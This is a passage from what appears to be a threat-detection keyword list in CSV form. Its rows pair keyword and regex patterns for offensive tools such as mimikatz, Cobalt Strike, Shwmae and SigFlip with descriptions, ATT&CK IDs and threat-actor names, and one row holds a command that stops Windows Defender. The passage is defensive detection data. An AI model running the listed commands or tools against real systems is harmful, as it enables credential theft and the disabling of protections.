"*shit.fuck.org*",".{0,1000}shit\.fuck\.org.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","59394"
"*shmilylty/cheetah*",".{0,1000}shmilylty\/cheetah.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","59395"
"*shocknawe.py*",".{0,1000}shocknawe\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","59396"
"*Shodan.io*",".{0,1000}Shodan\.io.{0,1000}","offensive_tool_keyword","shodan.io","Shodan is the worlds first search engine for Internet-connected devices.","T1016 - T1597 - T1526 - T1046 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","Black Basta","Reconnaissance","https://www.shodan.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59397"
"*shodanp.py*",".{0,1000}shodanp\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","59398"
"*Shoggoth doesn't support x86 PE yet*",".{0,1000}Shoggoth\sdoesn\'t\ssupport\sx86\sPE\syet.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","59399"
"*ShoggothPolyEngine(*",".{0,1000}ShoggothPolyEngine\(.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","59400"
"*ShorSec/DavRelayUp*",".{0,1000}ShorSec\/DavRelayUp.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","59401"
"*ShorSec/DllNotificationInjection*",".{0,1000}ShorSec\/DllNotificationInjection.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","59402"
"*ShorSec/ShadowSpray*",".{0,1000}ShorSec\/ShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","59403"
"*Show-BallonTip.ps1*",".{0,1000}Show\-BallonTip\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59404"
"*Show-BalloonTip.ps1*",".{0,1000}Show\-BalloonTip\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59405"
"*Show-TargetScreen.ps1*",".{0,1000}Show\-TargetScreen\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","59406"
"*Show-TargetScreen.ps1*",".{0,1000}Show\-TargetScreen\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","59407"
"*-ShowWindowMode:Hide sc stop WinDefend*",".{0,1000}\-ShowWindowMode\:Hide\ssc\sstop\sWinDefend.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","59408"
"*Show-WMImplantMainMenu*",".{0,1000}Show\-WMImplantMainMenu.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","59409"
"*shspawn x64 *",".{0,1000}shspawn\sx64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59421"
"*shspawn x86 *",".{0,1000}shspawn\sx86\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59422"
"*shucknt.php*",".{0,1000}shucknt\.php.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","59423"
"*ShuckNT-main*",".{0,1000}ShuckNT\-main.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","59424"
"*ShutdownRepo/pywhisker*",".{0,1000}ShutdownRepo\/pywhisker.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","59425"
"*ShutdownRepo/smartbrute*",".{0,1000}ShutdownRepo\/smartbrute.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59426"
"*ShutdownRepo/smartbrute*",".{0,1000}ShutdownRepo\/smartbrute.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","59427"
"*Shwmae dump *",".{0,1000}Shwmae\sdump\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59428"
"*Shwmae enum *",".{0,1000}Shwmae\senum\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59429"
"*Shwmae prt *",".{0,1000}Shwmae\sprt\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59430"
"*Shwmae prt *",".{0,1000}Shwmae\sprt\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59431"
"*Shwmae sign *",".{0,1000}Shwmae\ssign\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59432"
"*Shwmae webauthn *",".{0,1000}Shwmae\swebauthn\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59433"
"*Shwmae webauthn*",".{0,1000}Shwmae\swebauthn.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59434"
"*Shwmae.exe sign*",".{0,1000}Shwmae\.exe\ssign.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","59435"
"*sid::clear*",".{0,1000}sid\:\:clear.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","59436"
"*sid::lookup*",".{0,1000}sid\:\:lookup.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","59437"
"*sid::modify*",".{0,1000}sid\:\:modify.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","59438"
"*sid::patch*",".{0,1000}sid\:\:patch.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","59439"
"*sigflip*/Bof/*",".{0,1000}sigflip.{0,1000}\/Bof\/.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59440"
"*SigFlip.exe -*",".{0,1000}SigFlip\.exe\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","59441"
"*SigFlip.WinTrustData*",".{0,1000}SigFlip\.WinTrustData.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat 